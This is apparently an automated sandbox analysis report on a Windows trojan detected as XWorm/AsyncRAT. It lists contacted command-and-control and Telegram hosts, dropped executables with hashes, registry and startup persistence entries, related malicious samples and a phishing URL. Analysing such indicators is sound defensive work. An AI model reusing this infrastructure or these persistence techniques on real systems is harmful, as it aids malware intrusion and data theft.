https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | DeadROOTkit.exe, 00000002.00000002.2956134718.000000000243F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DeadXClient.exe, 00000001.00000002.2955878706.0000000002901000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
147.185.221.20 | updates-full.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
147.185.221.21 | subscribe-bond.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532627
Start date and time: 2024-10-13 19:14:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 28
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: mIURiU8n2P.exe (renamed because the original name is a hash value)
Original Sample Name: bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@27/83@5/4
EGA Information:
• Successful, ratio: 73.3%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 144
• Number of non-executed functions: 284
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.190.152.21, 20.190.152.22, 40.126.24.82, 20.190.152.19, 40.126.24.147, 40.126.24.148, 40.126.24.146, 40.126.24.81
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target DeadXClient.exe, PID 5324 because it is empty
• Execution Graph export aborted for target Deadsvchost.exe, PID 7452 because it is empty
• Execution Graph export aborted for target mIURiU8n2P.exe, PID 2076 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7176 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
13:15:01 | API Interceptor | 54x Sleep call for process: powershell.exe modified
13:15:04 | API Interceptor | 44065x Sleep call for process: DeadXClient.exe modified
13:15:37 | API Interceptor | 364561x Sleep call for process: winlogon.exe modified
13:15:39 | API Interceptor | 275865x Sleep call for process: lsass.exe modified
13:15:40 | API Interceptor | 4199x Sleep call for process: svchost.exe modified
13:15:43 | API Interceptor | 328384x Sleep call for process: dwm.exe modified
13:15:47 | API Interceptor | 262x Sleep call for process: DeadROOTkit.exe modified
13:16:00 | API Interceptor | 154x Sleep call for process: spoolsv.exe modified
13:16:12 | API Interceptor | 43x Sleep call for process: dllhost.exe modified
18:15:04 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
18:15:06 | Task Scheduler | Run new task: Deadsvchost path: C:\Users\Public\Deadsvchost.exe
18:15:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
18:15:21 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
18:15:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DeadROOTkit C:\Users\user\AppData\Local\DeadROOTkit.exe
18:15:57 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DeadROOTkit C:\Users\user\AppData\Local\DeadROOTkit.exe
18:16:06 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | 80BvHOM51j.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | sB2ClgrGng.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | ip-api.com/json/?fields=225545
208.95.112.1 | s3OBQLA3xR.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | W1FREE.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Tracking#1Z379W410424496200.vbs | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Orden de Compra 097890.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | PO.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Purchase_Order.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 4HyAcc2Dct.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
149.154.167.220 | 8svMXMXNRn.exe | Get hash | malicious | NoCry, XWorm | Browse |
149.154.167.220 | sB2ClgrGng.exe | Get hash | malicious | Blank Grabber, XWorm | Browse |
149.154.167.220 | 1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | 20062024150836 11.10.2024.vbe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292 | Get hash | malicious | Unknown | Browse |
149.154.167.220 | SecuriteInfo.com.FileRepMalware.1304.4177.exe | Get hash | malicious | Unknown | Browse |
149.154.167.220 | SecuriteInfo.com.FileRepMalware.1304.4177.exe | Get hash | malicious | Unknown | Browse |
149.154.167.220 | d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
149.154.167.220 | PO 2024-91113.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ip-api.com | 80BvHOM51j.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
ip-api.com | sB2ClgrGng.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | 208.95.112.1
ip-api.com | s3OBQLA3xR.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | W1FREE.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | Tracking#1Z379W410424496200.vbs | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Orden de Compra 097890.xlam.xlsx | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | PO.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Purchase_Order.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | 4HyAcc2Dct.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
api.telegram.org | 8svMXMXNRn.exe | Get hash | malicious | NoCry, XWorm | Browse | 149.154.167.220
api.telegram.org | sB2ClgrGng.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | 149.154.167.220
api.telegram.org | 1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | 20062024150836 11.10.2024.vbe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292 | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | SecuriteInfo.com.FileRepMalware.1304.4177.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | SecuriteInfo.com.FileRepMalware.1304.4177.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
api.telegram.org | d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 149.154.167.220
api.telegram.org | PO 2024-91113.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      SALSGIVERUS8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 147.185.221.23
                                                      7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      5q4X9fRo4b.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 147.185.221.17
                                                      TELEGRAMRU8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 149.154.167.220
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 149.154.167.220
                                                      1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 149.154.167.220
                                                      PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      _GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      TUT-ASUS80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 208.95.112.1
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 208.95.112.1
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PO.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SALSGIVERUS8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 147.185.221.23
                                                      7yJsmmW4wS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      I8YtUAUWeS.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      W1FREE.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.23
                                                      dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.18
                                                      432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                                      • 147.185.221.22
                                                      5q4X9fRo4b.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 147.185.221.17
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0e8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                      • 149.154.167.220
                                                      80BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 149.154.167.220
                                                      sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                      • 149.154.167.220
                                                      jcMcDQ11pZ.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • 149.154.167.220
                                                      hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                                      • 149.154.167.220
                                                      hvnc-CR-SCR-0710.bin.exeGet hashmaliciousPureCrypterBrowse
                                                      • 149.154.167.220
                                                      https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      https://kucoinexplora.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      https://shawri.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.154.167.220
                                                      https://server.h74w.com/invite/12536668Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.220
                                                      No context
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):155136
                                                      Entropy (8bit):7.794589901193739
                                                      Encrypted:false
                                                      SSDEEP:3072:9QpsyzjtpfkzW/7F/ix/ApwXnDLn10FbxYSC/B9KIZb29b/HvX:9QpsyzjtpfOW/7FO/AKL10FbmlBoIYRn
                                                      MD5:B8479A23C22CF6FC456E197939284069
                                                      SHA1:B2D98CC291F16192A46F363D007E012D45C63300
                                                      SHA-256:18294EE5A6383A48D1BCF2703F17D815529DF3A17580E027C3EFEA1800900E8F
                                                      SHA-512:786CD468CE3723516DC869B09E008EC5D35D1F0C1A61E70083A3BE15180866BE637BD7D8665C2F0218C56875A0EE597C277E088F77DD403BDD2182D06BAD3BD4
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                      • Antivirus: Virustotal, Detection: 82%
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):43520
                                                      Entropy (8bit):5.571588653306265
                                                      Encrypted:false
                                                      SSDEEP:768:8kQn3SBsJVCm+1pout8PKiFF+g9h7ey96FOChJ8gL7Zs6r:83dJYDLqvFn9wy96FOCsg7
                                                      MD5:7DD98FC2976EE270A278E1A9A28EEFAE
                                                      SHA1:0497EE045226B2D310C7678ED055EEEDBC88DC77
                                                      SHA-256:5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
                                                      SHA-512:94CAB0F684F79E7ADB6BEA43A909D9621A2EF6BF223FBF4650B040766E7EDFC95D77F62AA852EFCCB7752442E96182329934EEE58AD4B8F579A75BD8414D984C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 64%
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):35840
                                                      Entropy (8bit):5.5592928582204815
                                                      Encrypted:false
                                                      SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                      MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                      SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                      SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                      • Antivirus: Virustotal, Detection: 71%
                                                      Process:C:\Users\Public\DeadXClient.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):35840
                                                      Entropy (8bit):5.5592928582204815
                                                      Encrypted:false
                                                      SSDEEP:768:uDMfF7zLKYs2Byj54uddqLi9Fk9wWO/hu/222t:ukF7HKYs/1dd9Fk9wWO/4u2i
                                                      MD5:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      SHA1:DEEEE7D4F336D0BA898B5579720AAF630951A72F
                                                      SHA-256:4353E37A3D60DD30BEEEC61A812A07BA6BFC174A18CDD5A95BE98666DB2F7CF6
                                                      SHA-512:2B21C93EE09865A5C5F365CB945EBC2473A5B8DDCE009302E8F03815D7784AD3A95D615678B3B49E272D235D10C03262F2DDAAEC9DE8A373C0487B7904BD7858
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                      • Antivirus: Virustotal, Detection: 71%
                                                      Process:C:\Users\Public\DeadROOTkit.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):43520
                                                      Entropy (8bit):5.571588653306265
                                                      Encrypted:false
                                                      SSDEEP:768:8kQn3SBsJVCm+1pout8PKiFF+g9h7ey96FOChJ8gL7Zs6r:83dJYDLqvFn9wy96FOCsg7
                                                      MD5:7DD98FC2976EE270A278E1A9A28EEFAE
                                                      SHA1:0497EE045226B2D310C7678ED055EEEDBC88DC77
                                                      SHA-256:5711B50667B4DE000C8031724427EC6CD00B41B760CA1608421DC47B549E2093
                                                      SHA-512:94CAB0F684F79E7ADB6BEA43A909D9621A2EF6BF223FBF4650B040766E7EDFC95D77F62AA852EFCCB7752442E96182329934EEE58AD4B8F579A75BD8414D984C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\DeadROOTkit.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                      • Antivirus: Virustotal, Detection: 64%
                                                      Process:C:\Users\Public\Deadsvchost.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):654
                                                      Entropy (8bit):5.380476433908377
                                                      Encrypted:false
                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                      Process:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):1088
                                                      Entropy (8bit):5.389928136181357
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                                      MD5:6B2359BF987F4BDAF6CB014F63217859
                                                      SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                                      SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                                      SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                                      Process:C:\Windows\System32\lsass.exe
                                                      File Type:very short file (no magic)
                                                      Category:modified
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3::
                                                      MD5:93B885ADFE0DA089CDF634904FD59F71
                                                      SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                      SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                      SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                      Malicious:false
                                                      Preview:.
